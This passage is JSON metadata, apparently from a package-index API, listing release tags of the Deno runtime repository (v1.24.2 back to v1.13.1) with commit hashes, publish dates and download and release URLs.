/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"htt